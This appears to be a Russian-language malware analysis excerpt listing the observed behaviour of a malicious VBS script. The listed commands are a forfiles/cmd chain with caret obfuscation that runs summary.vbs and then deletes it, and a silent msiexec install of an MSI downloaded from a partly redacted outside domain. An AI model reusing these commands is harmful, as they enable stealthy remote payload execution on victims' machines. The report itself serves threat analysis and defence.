Техническая информация
- '<SYSTEM32>\wscript.exe' <Текущая директория>\summary.vbs
- '<SYSTEM32>\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /c ws^c^r^ipt^.exe <Текущая директория>\summary.vbs&del "<Текущая директория>\summary.vbs"
- <Текущая директория>\summary.vbs
- <Текущая директория>\summary.vbs
- http://kr###gate.com/test/1.msi
- DNS ASK kr###gate.com
- '<SYSTEM32>\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /c ws^c^r^ipt^.exe <Текущая директория>\summary.vbs&del "<Текущая директория>\summary.vbs"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' ws^c^r^ipt^.exe <Текущая директория>\summary.vbs&del <Текущая директория>\summary.vbs
- '<SYSTEM32>\cmd.exe' /c msiexec/q/ihttp://kr###gate.com/test/1.msi
- '<SYSTEM32>\msiexec.exe' /q/ihttp://kr###gate.com/test/1.msi